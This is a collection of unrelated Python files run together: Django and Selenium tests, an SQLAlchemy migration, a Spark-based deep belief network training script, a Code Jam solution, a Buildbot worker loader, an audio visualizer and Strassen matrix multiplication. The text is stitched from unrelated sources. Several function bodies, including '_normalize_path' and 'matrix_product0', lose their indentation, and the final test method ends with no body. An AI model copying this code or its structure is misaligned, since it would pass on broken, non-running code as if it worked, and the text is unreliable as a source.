    def is_alert_present(self):
        """Return True if a JavaScript alert is currently open."""
        try:
            self.driver.switch_to_alert()
        except NoAlertPresentException:
            return False
        return True

    def close_alert_and_get_its_text(self):
        """Accept or dismiss the open alert and return its text."""
        try:
            alert = self.driver.switch_to_alert()
            text = alert.text
            if self.accept_next_alert:
                alert.accept()
            else:
                alert.dismiss()
            return text
        finally:
            self.accept_next_alert = True

    def tearDown(self):
        self.driver.quit()
        self.assertEqual([], self.verificationErrors)


if __name__ == "__main__":
    unittest.main()
|
from sqlalchemy import MetaData, Table, Column, Integer, NVARCHAR
meta = MetaData()
def upgrade(migrate_engine):
    """Create the ``journal`` table on the given engine."""
    meta.bind = migrate_engine
    journal = Table(
        "journal",
        meta,
        Column("id", Integer, primary_key=True),
        Column("name", NVARCHAR(500), index=True),
    )
    journal.create()
def downgrade(migrate_engine):
    """Drop the ``journal`` table (reverse of :func:`upgrade`)."""
    meta.bind = migrate_engine
    Table("journal", meta, autoload=True).drop()
|
""" Open datasets """
from .base import Openset, ImagesOpenset
from .mnist import MNIST
from .cifar import CIFAR10, CIFAR100
|
from abc import ABCMeta, abstractmethod
class AnalysisBase(metaclass=ABCMeta):
    """Abstract interface for an analysis step."""
    @abstractmethod
    def run(self, user_request):
        """Execute the analysis for *user_request*; must be overridden."""
        pass
|
import os
from appconf import AppConf
from django.conf import settings
class XMLAppConf(AppConf):
    """django-appconf settings container for this app."""
    class Meta:
        # Settings are looked up as XML_<NAME> in django.conf.settings.
        prefix = "xml"
|
import sympy.physics.mechanics as _me
import sympy as _sm
import math as m
import numpy as _np
x, y = _me.dynamicsymbols('x y')
a, b, r = _sm.symbols('a b r', real=True)
# Two nonlinear equations assembled directly into one column matrix
# (equivalent to building a 1x1 matrix and row_insert-ing the second row).
eqn = _sm.Matrix([
    [a*x**3 + b*y**2 - r],
    [a*_sm.sin(x)**2 + b*_sm.cos(2*y) - r**2],
])
# Substitute numeric parameter values before solving numerically.
matrix_list = [entry.subs({a: 2.0, b: 3.0, r: 1.0}) for entry in eqn]
print(_sm.nsolve(matrix_list, (x, y), (_np.deg2rad(30), 3.14)))
|
"""
Tests for the custom serialization code used by the API application.
Copyright (C) 2020 Nicholas H.Tollervey.
"Commons Clause" License Condition v1.0:
The Software is provided to you by the Licensor under the License, as defined
below, subject to the following condition.
Without limiting other conditions in the License, the grant of rights under the
License will not include, and the License does not grant to you, the right to
Sell the Software.
For purposes of the foregoing, "Sell" means practicing any or all of the rights
granted to you under the License to provide to third parties, for a fee or
other consideration (including without limitation fees for hosting or
consulting/support services related to the Software), a product or service
whose value derives, entirely or substantially, from the functionality of the
Software. Any license notice or attribution required by the License must also
include this Commons Clause License Condition notice.
MIT License:
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from unittest import mock
from api import serializers
from rest_framework.exceptions import ValidationError
from django.test import TestCase
class TagPathFieldTestCase(TestCase):
    """
    Exercises the bespoke TagPathField.
    """

    def test_to_representation(self):
        """
        The string representation of the tag path is passed through without
        any change.
        """
        tag_path = "namespace/tag"
        self.assertEqual(
            tag_path, serializers.TagPathField().to_representation(tag_path)
        )

    def test_to_internal_value_not_string(self):
        """
        Validation raises a ValidationError when the incoming value is not a
        string.
        """
        with self.assertRaises(ValidationError):
            serializers.TagPathField().run_validation(1)

    def test_to_internal_value_incorrect_format(self):
        """
        Validation raises a ValidationError for a string that is not in the
        namespace/tag format.
        """
        with self.assertRaises(ValidationError):
            serializers.TagPathField().run_validation("incorrect-tag-path")

    def test_to_internal_value_is_correct(self):
        """
        A valid tag path passes validation unchanged.
        """
        tag_path = "namespace-name/tag_name"
        self.assertEqual(
            tag_path, serializers.TagPathField().run_validation(tag_path)
        )
class TagValueDictFieldTestCase(TestCase):
    """
    Exercises the TagValueDictField. This is a bespoke DictField that ensures
    keys are valid TagPathFields.
    """
    def test_get_value_is_html(self):
        """
        Ensure that getting the value of the field works with HTML form fields.
        """
        field = serializers.TagValueDictField()
        field.field_name = "test_field"
        test_dict = {}
        # Patch the DRF html helper so the HTML branch is taken.
        mock_html = mock.MagicMock()
        mock_html.parse_html_dict.return_value = "it worked!"
        with mock.patch("api.serializers.html", mock_html):
            result = field.get_value(test_dict)
        self.assertEqual("it worked!", result)
        mock_html.is_html_input.assert_called_once_with(test_dict)
        mock_html.parse_html_dict.assert_called_once_with(
            test_dict, prefix=field.field_name
        )
    def test_get_value(self):
        """
        Ensure that getting the value of the field works with native dictionary
        representations.
        """
        field = serializers.TagValueDictField()
        field.field_name = "test_field"
        test_dict = mock.MagicMock()
        test_dict.get.return_value = "it worked!"
        # is_html_input -> False forces the native-dict branch.
        mock_html = mock.MagicMock()
        mock_html.is_html_input.return_value = False
        with mock.patch("api.serializers.html", mock_html):
            result = field.get_value(test_dict)
        self.assertEqual("it worked!", result)
        test_dict.get.assert_called_once_with(
            field.field_name, serializers.serializers.empty
        )
    def test_to_internal_value_html_input(self):
        """
        If the input data is from an HTML form, ensure it is parsed into a
        dictionary object before further validation occurs.
        """
        field = serializers.TagValueDictField()
        field.field_name = "test_field"
        test_dict = "a dict in html"
        mock_html = mock.MagicMock()
        mock_html.is_html_input.return_value = True
        dict_result = {
            "namespace_name/tag-name": "a value",
        }
        mock_html.parse_html_dict.return_value = dict_result
        with mock.patch("api.serializers.html", mock_html):
            result = field.to_internal_value(test_dict)
        self.assertEqual(dict_result, result)
    def test_to_internal_value_not_dict(self):
        """
        When validation is called, to_internal raises a ValidationError if the
        passed in value is not a dictionary.
        """
        field = serializers.TagValueDictField()
        val = 123
        mock_html = mock.MagicMock()
        mock_html.is_html_input.return_value = False
        with mock.patch("api.serializers.html", mock_html):
            with self.assertRaises(ValidationError):
                field.to_internal_value(val)
    def test_to_internal_value_is_empty(self):
        """
        When validation is called with allow_empty=False, to_internal raises a
        ValidationError if the passed in value is an empty dictionary.
        """
        field = serializers.TagValueDictField(allow_empty=False)
        val = {}
        mock_html = mock.MagicMock()
        mock_html.is_html_input.return_value = False
        with mock.patch("api.serializers.html", mock_html):
            with self.assertRaises(ValidationError):
                field.to_internal_value(val)
    def test_to_representation(self):
        """
        The dict representation is simply passed through without any change.
        """
        field = serializers.TagValueDictField()
        val = {
            "namespace_name/tag-name": "a value",
        }
        self.assertEqual(val, field.to_representation(val))
    def test_run_child_validation(self):
        """
        A dictionary containing correctly formatted keys is checked and
        returned without raising any errors.
        """
        field = serializers.TagValueDictField()
        val = {
            "namespace_name/tag-name": "a value",
        }
        result = field.run_child_validation(val)
        self.assertEqual(result, val)
    def test_run_child_validation_bad_key(self):
        """
        A dictionary with an incorrectly formatted key results in a
        ValidationError exception being thrown.
        """
        field = serializers.TagValueDictField()
        val = {
            "namespace_name--tag-name": "a value",
        }
        with self.assertRaises(ValidationError):
            field.run_child_validation(val)
|
# -*- coding:UTF-8 -*-
# select parameters to output DBN model
import numpy as np
np.random.seed(1337) # for reproducibility
from sklearn.datasets import load_boston
from sklearn.cross_validation import train_test_split
from sklearn.metrics.regression import r2_score, mean_squared_error
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
from dbn.tensorflow import SupervisedDBNRegression
import matplotlib
matplotlib.use('Agg')
import scipy.io as scio
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import sys
import os
sys.path.append(os.getcwd())
from numpy import exp
from pyspark import *
#from dbn import mylogging
import json
sc = SparkContext("local[16]","stock",batchSize=1000)
def makegraphe(a, b, name_png):
    """Scatter-plot b against a and write the figure to name_png."""
    plt.scatter(a, b, c='r', alpha=0.5)
    plt.savefig(name_png)
def readargs(i):
    """Return the i-th non-empty line of args.cfg parsed as JSON.

    Blank lines are skipped and do not consume an index.  If fewer than
    i+1 non-empty lines exist, the last line read is parsed instead
    (legacy behavior preserved).

    Args:
        i: zero-based index; may be an int or a numeric string (it comes
           straight from argv in main()).
    """
    ss = ""
    ii = 0
    # Context manager guarantees the handle is closed even if something
    # raises mid-read; iterating the file lazily avoids readlines()'s
    # whole-file materialization.
    with open("args.cfg", "r") as f:
        for line in f:
            ss = line.replace("\n", "")
            if ss == "":
                # Blank lines do not advance the index.
                continue
            if ii == int(i):
                print(ii, i, "---------------")
                break
            ii = ii + 1
    print(ss)
    return json.loads(ss)
def main(argv):
    """CLI entry point: argv[1] selects a parameter set in args.cfg,
    trains/evaluates a DBN with it, and appends the scores plus the
    parameters to result.log."""
    argno = argv[1]
    print("_----------------------------:",argv[1])
    __args = readargs(argno)
    print(__args)
    # train_args returns (train R2, train MSE, test R2, test MSE).
    (tr,ts,testr,tests) = train_args(__args["hidden_layers_structure"],
                __args["learning_rate_rbm"],
                __args["learning_rate"],
                __args["n_epochs_rbm"],
                __args["n_iter_backprop"],
                __args["batch_size"],
                __args["activation_function"],
                __args["dropout_p"],
                argno
                )
    # One space-separated result line per run: id, four scores, then the
    # hyper-parameters used.
    writelog("{} {} {} {} {} {} {} {} {} {} {} {} {}\n".format(__args["i"] \
        ,tr,ts,testr,tests,__args["hidden_layers_structure"], \
        __args["learning_rate_rbm"], \
        __args["learning_rate"], \
        __args["n_epochs_rbm"], \
        __args["n_iter_backprop"], \
        __args["batch_size"], \
        __args["activation_function"], \
        __args["dropout_p"] \
        ))
def writelog(context):
    """Append *context* verbatim to result.log.

    Uses a context manager so the handle is closed even if the write
    raises (the original closed it only on the success path).
    """
    with open("result.log", "a+") as f:
        f.write(context)
def train_args(hidden_layers_structure,learning_rate_rbm,learning_rate,n_epochs_rbm,
               n_iter_backprop,batch_size,activation_function,dropout_p,argno):
    """Train a SupervisedDBNRegression on rows read from Spark ("/data")
    and return (train R2, train MSE, test R2, test MSE).  The fitted model
    is saved to ./out/model_<argno>.pkl."""
    ########################################################################
    global sc
    lines = sc.textFile("/data",2)
    print(lines.count())
    # Each text row is parsed into a float32 vector (space separated).
    lines = lines.map(lambda s : np.fromstring(s,dtype=np.float32,sep=" "))
    l = []
    total_num_input=18
    # Training
    regressor = SupervisedDBNRegression(hidden_layers_structure=hidden_layers_structure,
                                        learning_rate_rbm=learning_rate_rbm,
                                        learning_rate=learning_rate,
                                        n_epochs_rbm=n_epochs_rbm,
                                        n_iter_backprop=n_iter_backprop,
                                        batch_size=batch_size,
                                        activation_function=activation_function,
                                        dropout_p=dropout_p)
    # NOTE(review): the training block below sits INSIDE the iterator loop
    # with no break, so it re-runs for every row after the 28881st —
    # presumably the dataset has exactly 28881 rows; confirm, or add a
    # `break` after the test evaluation.
    for x in lines.toLocalIterator():
        l.append(x)
        if(len(l)>=28881):
            idata = np.array(l)
            # Column 0 is the target; columns 1..18 are the features.
            X=idata[:,1:total_num_input+1]
            Y=idata[:,0]
            #X = minmax(X)
            # Splitting data
            X_train = X[0:19000,:]
            X_test = X[19000:28881,:]
            Y_train = Y[0:19000]
            Y_test = Y[19000:28881]
            # Train
            X_train_select = X_train[:,0:total_num_input]
            regressor.fit(X_train_select, Y_train)
            # Save the model
            regressor.save('./out/model_{}.pkl'.format(argno))
            # regressor.save('model.pkl')
            Y_train_pred = regressor.predict(X_train_select)
            # l = []
            print('Done.\nR-squared: %f\nMSE: %f' % (r2_score(Y_train, Y_train_pred), mean_squared_error(Y_train, Y_train_pred)))
            ##########################################################################################################
            # Test
            ##########################################################################################################
            X_test_select = X_test[:,0:total_num_input]
            Y_test_pred = regressor.predict(X_test_select)
            print('Done.\nR-squared: %f\nMSE: %f' % (r2_score(Y_test, Y_test_pred), mean_squared_error(Y_test, Y_test_pred)))
    ##########################################################################################################
    return(r2_score(Y_train, Y_train_pred), mean_squared_error(Y_train, Y_train_pred),
           r2_score(Y_test, Y_test_pred), mean_squared_error(Y_test, Y_test_pred))
if __name__ == '__main__':
    # Propagate main()'s return value as the process exit status.
    sys.exit(main(sys.argv))
|
# Google Code Jam 2016 qualification, "Counting Sheep".
# For each case, walk the multiples of a and accumulate the decimal digits
# seen; the answer is the first multiple after which all ten digits have
# appeared.  a == 0 never shows any digit but 0, hence INSOMNIA.
# Context managers replace the manual open/close so both files are closed
# even if parsing fails mid-run.
with open('A-large.in', 'r') as fin, open('output', 'w') as fout:
    t = int(fin.readline())
    for case in range(1, t + 1):
        a = int(fin.readline())
        if a == 0:
            fout.write("Case #" + str(case) + ": INSOMNIA\n")
            continue
        seen = set()           # digit characters observed so far
        multiple = 0
        while len(seen) < 10:
            multiple += a
            # str() exposes the decimal digits; update() adds each char.
            seen.update(str(multiple))
        fout.write("Case #" + str(case) + ": " + str(multiple) + "\n")
|
""" Buildbot inplace config
(C) Copyright 2015 HicknHack Software GmbH
The original code can be found at:
https://github.com/hicknhack-software/buildbot-inplace-config
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from glob import glob
from os import path
from twisted.python import log
from yaml import safe_load
from buildbot.worker import Worker as BuildbotWorker
from pprint import pformat
def _normalize_path(p):
s = p.replace("\\", "/")
if s[-1] is not "/":
s += "/"
return s
class Worker(dict):
    """A worker definition loaded from a YAML file.

    Behaves as a plain dict of the YAML keys, with typed accessors for the
    fields the buildbot configuration relies on.
    """

    @property
    def name(self):
        return self['name']

    @property
    def password(self):
        return self['password']

    @property
    def shell(self):
        return self['shell']

    @property
    def setup_dir(self):
        # Normalized so path joins can safely assume a trailing slash.
        return _normalize_path(self['setupDir'])

    @property
    def platforms(self):
        return self['platforms']

    @property
    def setups(self):
        return self['setups']

    def build_worker(self):
        """Create the buildbot Worker object for this definition."""
        return BuildbotWorker(self.name, self.password)

    @staticmethod
    def load(workers_dir, inplace_workers, workers):
        """Load every *.yml in workers_dir into both registries.

        Raises if no worker files are found; silently skips files whose
        YAML does not parse to a dict.
        """
        files = glob(path.join(workers_dir, '*.yml'))
        if not files:
            raise Exception("No workers found in '%s'!" % workers_dir)
        workers.clear()
        inplace_workers.clear()
        for f in files:
            # `with` closes the handle even if YAML parsing raises
            # (the original leaked the handle on a parse error).
            with open(f, 'r') as s:
                worker_dict = safe_load(s)
            if not isinstance(worker_dict, dict):
                continue
            inplace_worker = Worker(**worker_dict)
            inplace_workers.named_set(inplace_worker)
            log.msg("Registered Worker '%s' on %s with setups %s" %
                    (inplace_worker.name, pformat(inplace_worker.platforms), pformat(inplace_worker.setups)),
                    system='Inplace Config')
            workers.named_set(inplace_worker.build_worker())
|
"""
Created on 2 Mar. 2018
@author: oliver
"""
class ClassifiedLine(object):
    """A single source line together with its classification result."""

    def __init__(self, filename, line_number, classification):
        """Record where the line came from and how it was classified."""
        self.filename = filename
        self.line_number = line_number
        self.classification = classification
        # Lower-confidence alternative classifications, kept for debugging.
        self._secondary_classifications = []

    def add_secondary_classification(self, classification):
        """Remember an alternative classification (debugging aid)."""
        self._secondary_classifications.append(classification)
|
import matplotlib.pyplot as plt
import numpy as np
import wave
import sys
from scipy import signal
def visualize_wave(path, step, target):
    """Plot the waveform and spectrogram of a vocoder-generated PCM wav.

    Opens ``<path><step>k_steps_<target>_target_pcm.wav``, draws amplitude
    vs. time (one trace per channel) and a spectrogram, saves a PNG under
    ./wav_visualizations/ and shows the figure.
    """
    spf = wave.open(path + str(step) + "k_steps_"+ str(target) + "_target_pcm.wav", "r")
    # Extract raw audio from the wav file.
    raw = spf.readframes(-1)
    # np.fromstring on binary data is deprecated (removed in newer NumPy);
    # frombuffer is the supported zero-copy equivalent.  Renamed from
    # `signal`, which shadowed the scipy.signal import.
    samples = np.frombuffer(raw, dtype=np.int16)
    fs = spf.getframerate()
    n_channels = spf.getnchannels()
    # De-interleave into one array per channel.
    channels = [samples[channel::n_channels] for channel in range(n_channels)]
    if n_channels == 2:
        print("Just mono files")
    # Integer sample count: a float `num` breaks np.linspace on modern NumPy.
    n_samples = len(samples) // n_channels
    Time = np.linspace(0, n_samples / fs, num=n_samples)
    plt.figure(1)
    # Amplitude graph of the wave file.
    a = plt.subplot(211)
    plt.title("Vocoder " + str(step) + "k steps " + str(target) + " target")
    for channel in channels:
        plt.plot(Time, channel)
    a.set_xlabel("Time (seconds)")
    a.set_ylabel("Amplitude")
    # Spectrogram of the wave file.
    c = plt.subplot(212)
    Pxx, freqs, bins, im = c.specgram(samples, NFFT=1024, Fs=16000, noverlap=900)
    c.set_xlabel("Time (seconds)")
    c.set_ylabel("Frequency")
    plt.savefig("./wav_visualizations/vocoder_" + str(step) + "k_steps_" + str(target) + "_target_wav_visualization.png")
    plt.show()
if __name__ == "__main__":
# Note: to run the visualization, the wav files generated by the vocoder must first be in the PCM format.
# Can do so by using some online converter or other software to change formats to Wav-PCM
visualize_wave("./vocoder/saved_models/initial_english_run_modified/", 13, 4)
|
#coding: latin1
def matrix_product0(A: "matrix", B: "matrix") -> "matrix": #[intro0
p, q, r = len(A), len(A[0]), len(B[0])
C = [[0] * r for i in range(p)]
for i in range(p):
for j in range(r):
for k in range(q):
C[i][j] += A[i][k]*B[k][j]
return C #]intro0
def matrix_product(A: "matrix", B: "matrix") -> "matrix": #[intro
p, q, r = len(A), len(A[0]), len(B[0])
return [[sum(A[i][k]*B[k][j] for k in range(q)) for j in range(r)] for i in range(p)] #]intro
#< strassen
class SqMatrix:
    """Square matrix supporting +, -, and Strassen multiplication.

    The Strassen recursion in __mul__ assumes the dimension is a power of
    two; odd sizes are not padded.
    """

    def __init__(self, A: "square matrix"=None, n: "int"=0):
        """Wrap an existing list-of-rows, or build an n-by-n zero matrix."""
        # `A != None` compared by equality; identity is the correct idiom.
        if A is not None:
            if any(len(A) != len(row) for row in A):
                raise Exception("Non square matrix")
            self.n, self.A = len(A), A
        else:
            self.n, self.A = n, [[0] * n for _ in range(n)]

    def __getitem__(self, ij: "(int, int)"):
        """Read entry at (row, col)."""
        return self.A[ij[0]][ij[1]]

    def __setitem__(self, ij: "(int, int)", value: "T"):
        """Write entry at (row, col); returns the value."""
        self.A[ij[0]][ij[1]] = value
        return value

    def __add__(self, other: "SqMatrix"):
        """Entrywise sum; sizes must match."""
        if other.n != self.n:
            raise Exception("Different size matrices.")
        return SqMatrix([[self[i, j] + other[i, j] for j in range(self.n)]
                         for i in range(self.n)])

    def __sub__(self, other: "SqMatrix"):
        """Entrywise difference; sizes must match."""
        if other.n != self.n:
            raise Exception("Different size matrices.")
        return SqMatrix([[self[i, j] - other[i, j] for j in range(self.n)]
                         for i in range(self.n)])

    def split(self):
        """Return the four n/2-sized quadrants (a b / c d)."""
        mid = self.n // 2
        a = SqMatrix([[self[i, j] for j in range(mid)] for i in range(mid)])
        b = SqMatrix([[self[i, j] for j in range(mid, self.n)] for i in range(mid)])
        c = SqMatrix([[self[i, j] for j in range(mid)] for i in range(mid, self.n)])
        d = SqMatrix([[self[i, j] for j in range(mid, self.n)] for i in range(mid, self.n)])
        return a, b, c, d

    def join(self, a: "SqMatrix", b: "SqMatrix", c: "SqMatrix", d: "SqMatrix"):
        """Fill this matrix's quadrants from a (top-left) through d (bottom-right)."""
        mid = self.n // 2
        for i in range(mid):
            for j in range(mid):
                self[i, j] = a[i, j]
            for j in range(mid, self.n):
                self[i, j] = b[i, j - mid]
        for i in range(mid, self.n):
            for j in range(mid):
                self[i, j] = c[i - mid, j]
            for j in range(mid, self.n):
                self[i, j] = d[i - mid, j - mid]

    def __mul__(self, other: "SqMatrix"):
        """Strassen product: 7 recursive half-size multiplications."""
        if other.n != self.n:
            raise Exception("Different size matrices.")
        if self.n == 1:
            return SqMatrix([[self[0, 0] * other[0, 0]]])
        a, b, c, d = self.split()
        e, f, g, h = other.split()
        # The seven Strassen products.
        P1 = a * (f - h)
        P2 = (a + b) * h
        P3 = (c + d) * e
        P4 = d * (g - e)
        P5 = (a + d) * (e + h)
        P6 = (b - d) * (g + h)
        P7 = (a - c) * (e + f)
        # Recombine into the four result quadrants.
        r = P5 + P4 - P2 + P6
        s = P1 + P2
        t = P3 + P4
        u = P5 + P1 - P3 - P7
        result = SqMatrix(n=self.n)
        result.join(r, s, t, u)
        return result
#> strassen |
import os
import shutil
import time
from django import forms
from django.conf import settings
from django.core.cache import cache
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import Client, TestCase, override_settings
from django.urls import reverse
from posts.models import Group, Post, User
from yatube.settings import BASE_DIR
@override_settings(MEDIA_ROOT=os.path.join(BASE_DIR, 'temp_folder'))
class PostsPagesTests(TestCase):
    """View tests for posts: templates, context contents, group filtering."""

    @classmethod
    def setUpClass(cls):
        """Create two posts; one belongs to a group.  A second group is
        created but left empty so group filtering can be verified."""
        super().setUpClass()
        small_gif = (
            b'\x47\x49\x46\x38\x39\x61\x02\x00'
            b'\x01\x00\x80\x00\x00\x00\x00\x00'
            b'\xFF\xFF\xFF\x21\xF9\x04\x00\x00'
            b'\x00\x00\x00\x2C\x00\x00\x00\x00'
            b'\x02\x00\x01\x00\x00\x02\x02\x0C'
            b'\x0A\x00\x3B'
        )
        cls.uploaded = SimpleUploadedFile(
            name='small.gif',
            content=small_gif,
            content_type='image/gif'
        )
        cls.empty_group = Group.objects.create(
            title='Группа без постов',
            slug='test_empty',
            description='Пустая тестовая группа',
        )
        cls.filled_group = Group.objects.create(
            title='Группа с постами',
            slug='test_filled',
            description='Тестовая группа c одним постом',
        )
        cls.test_post_with_gr = Post.objects.create(
            text='Текст первого поста который относится к группе с постами',
            author=User.objects.create(username='group_filled_username'),
            group=cls.filled_group,
            image=cls.uploaded,
        )
        # Keep creation timestamps distinct so ordering is deterministic.
        time.sleep(0.1)
        cls.user_author = User.objects.create_user(
            username='group_empty_username'
        )
        cls.test_post_without_gr = Post.objects.create(
            text='Текст второго поста у которого нет группы',
            author=cls.user_author,
            image=cls.uploaded,
        )
        cls.edit_post_id = cls.test_post_without_gr.id

    @classmethod
    def tearDownClass(cls):
        # Remove the temporary MEDIA_ROOT created for the uploads.
        shutil.rmtree(settings.MEDIA_ROOT, ignore_errors=True)
        super().tearDownClass()

    def setUp(self):
        self.guest_client = Client()
        self.authorized_client = Client()
        self.authorized_client.force_login(PostsPagesTests.user_author)

    # BUG FIX: this method was named post_pages_use_correct_template, so the
    # unittest runner never collected or ran it.
    def test_post_pages_use_correct_template(self):
        """Each URL renders the expected template."""
        templates_page_names = {
            'index.html': reverse('posts:index'),
            'new_post.html': reverse('posts:new_post'),
            'group.html': (
                reverse(
                    'posts:group_posts',
                    kwargs={'slug': f'{PostsPagesTests.empty_group.slug}'}
                )
            ),
        }
        for template, reverse_name in templates_page_names.items():
            with self.subTest(template=template):
                response = self.authorized_client.get(reverse_name)
                self.assertTemplateUsed(response, template)

    def test_index_page_list_is_2(self):
        """The index page receives the expected number of objects."""
        response = self.authorized_client.get(reverse('posts:index'))
        self.assertEqual(len(response.context['page']), 2)

    def test_group_filled_slug_page_list_is_1(self):
        """The page of the group with one post receives exactly one object."""
        response = self.authorized_client.get(
            reverse(
                'posts:group_posts',
                kwargs={'slug': f'{PostsPagesTests.filled_group.slug}'}
            )
        )
        self.assertEqual(len(response.context['page']), 1)

    def test_group_filled_slug_page_list_is_0(self):
        """A post must not leak into a group it was not assigned to."""
        response = self.authorized_client.get(
            reverse(
                'posts:group_posts',
                kwargs={'slug': f'{PostsPagesTests.empty_group.slug}'}
            )
        )
        self.assertEqual(len(response.context['page']), 0)

    def test_index_page_show_correct_context(self):
        """The index template receives the correct context."""
        response = self.authorized_client.get(reverse('posts:index'))
        first_object = response.context['page'][0]
        post_text_0 = first_object.text
        post_image_0 = first_object.image
        self.assertEqual(
            post_text_0,
            f'{PostsPagesTests.test_post_without_gr.text}'
        )
        self.assertTrue(post_image_0 is not None)

    def test_group_page_show_correct_context(self):
        """The group template receives the correct context."""
        response = self.authorized_client.get(
            reverse(
                'posts:group_posts',
                kwargs={'slug': f'{PostsPagesTests.filled_group.slug}'}
            )
        )
        first_object = response.context['page'][0]
        post_text_0 = first_object.text
        post_image_0 = first_object.image
        self.assertEqual(
            post_text_0,
            f'{PostsPagesTests.test_post_with_gr.text}'
        )
        self.assertEqual(
            response.context['group'].title,
            f'{PostsPagesTests.filled_group.title}'
        )
        self.assertEqual(
            response.context['group'].description,
            f'{PostsPagesTests.filled_group.description}'
        )
        self.assertEqual(
            response.context['group'].slug,
            f'{PostsPagesTests.filled_group.slug}'
        )
        self.assertTrue(post_image_0 is not None)

    def test_new_post_show_correct_context(self):
        """The new_post template receives the correct form fields."""
        response = self.authorized_client.get(reverse('posts:new_post'))
        form_fields = {
            'group': forms.fields.ChoiceField,
            'text': forms.fields.CharField,
        }
        for value, expected in form_fields.items():
            with self.subTest(value=value):
                form_field = response.context['form'].fields[value]
                self.assertIsInstance(form_field, expected)

    def test_profile_show_correct_context(self):
        """The profile page receives the correct context."""
        response = self.authorized_client.get(
            reverse(
                'posts:profile',
                kwargs={'username': f'{PostsPagesTests.user_author.username}'}
            )
        )
        first_object = response.context['page'][0]
        post_text_0 = first_object.text
        post_image_0 = first_object.image
        self.assertEqual(
            post_text_0,
            f'{PostsPagesTests.test_post_without_gr.text}'
        )
        self.assertTrue(post_image_0 is not None)

    def test_post_show_correct_context(self):
        """The single-post page receives the correct context."""
        response = self.authorized_client.get(
            reverse(
                'posts:post',
                kwargs={
                    'username': f'{PostsPagesTests.user_author.username}',
                    'post_id': PostsPagesTests.edit_post_id,
                }
            )
        )
        first_object = response.context['post']
        post_text = first_object.text
        post_image = first_object.image
        self.assertEqual(
            post_text,
            f'{PostsPagesTests.test_post_without_gr.text}'
        )
        self.assertTrue(post_image is not None)

    def test_post_edit_show_correct_context(self):
        """The post-edit page receives the correct form fields."""
        response = self.authorized_client.get(
            reverse(
                'posts:post_edit',
                kwargs={
                    'username': f'{PostsPagesTests.user_author.username}',
                    'post_id': PostsPagesTests.edit_post_id,
                }
            )
        )
        form_fields = {
            'group': forms.fields.ChoiceField,
            'text': forms.fields.CharField,
        }
        for value, expected in form_fields.items():
            with self.subTest(value=value):
                form_field = response.context['form'].fields[value]
                self.assertIsInstance(form_field, expected)
class IndexPaginatorTest(TestCase):
    """Paginator tests for the index page."""
    @classmethod
    def setUpClass(cls):
        # 13 posts are created oldest-first (descending i) so that post 1
        # ends up newest; the sleep keeps creation timestamps distinct.
        super().setUpClass()
        cls.author = User.objects.create(username='test_user')
        for i in reversed(range(1, 14)):
            Post.objects.create(
                text=f'Тестовый текст {i}го поста',
                author=cls.author,
            )
            time.sleep(0.1)
    def setUp(self):
        self.guest_client = Client()
    def test_first_page_contains_ten_records(self):
        """The first index page shows 10 posts."""
        response = self.guest_client.get(reverse('posts:index'))
        self.assertEqual(len(response.context['page']), 10)
    def test_second_page_contains_three_records(self):
        """The second index page should contain the remaining three posts."""
        response = self.guest_client.get(reverse('posts:index') + '?page=2')
        self.assertEqual(len(response.context.get('page')), 3)
    def test_index_page_show_correct_posts(self):
        """Posts are rendered in the correct (newest-first) order."""
        response = self.guest_client.get(reverse('posts:index'))
        first_object = response.context['page'][0]
        post_text_0 = first_object.text
        self.assertEqual(
            post_text_0,
            'Тестовый текст 1го поста'
        )
class CacheIndexTest(TestCase):
    """Caching behaviour of the index page."""
    def setUp(self):
        self.guest_client = Client()
    def test_cache_index_page(self):
        """Check that the index page output is cached correctly."""
        Post.objects.create(
            text='Тестовый текст первого поста',
            author=User.objects.create(
                username='test_username1'
            )
        )
        first_response = self.guest_client.get(reverse('posts:index'))
        Post.objects.create(
            text='Тестовый текст второго поста',
            author=User.objects.create(
                username='test_username2'
            )
        )
        second_response = self.guest_client.get(reverse('posts:index'))
        first_response_content = first_response.content
        second_response_content = second_response.content
        # Still served from cache: the second post must not appear yet.
        self.assertEqual(
            first_response_content,
            second_response_content
        )
        cache.clear()
        third_response = self.guest_client.get(reverse('posts:index'))
        third_response_content = third_response.content
        # After clearing the cache the page is re-rendered with new content.
        self.assertNotEqual(
            first_response_content,
            third_response_content
        )
class FollowTests(TestCase):
    """Follow/unfollow behaviour and the follow feed."""
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        cls.follower_user = User.objects.create_user(
            username='follower_user'
        )
        cls.followed_user = User.objects.create_user(
            username='followed_user'
        )
    def setUp(self):
        self.authorized_follower_client = Client()
        self.authorized_followed_client = Client()
        self.authorized_follower_client.force_login(
            FollowTests.follower_user
        )
        self.authorized_followed_client.force_login(
            FollowTests.followed_user
        )
    def test_follow_works_properly(self):
        """An authorized user can subscribe to other users."""
        follower_number_initial = (FollowTests.followed_user.
                                   following.all().count())
        self.authorized_follower_client.get(
            reverse(
                'posts:profile_follow',
                kwargs={
                    'username': f'{FollowTests.followed_user.username}',
                }
            )
        )
        follower_number_follow = (FollowTests.followed_user.
                                  following.all().count())
        self.assertNotEqual(
            follower_number_initial,
            follower_number_follow
        )
    def test_unfollow_works_properly(self):
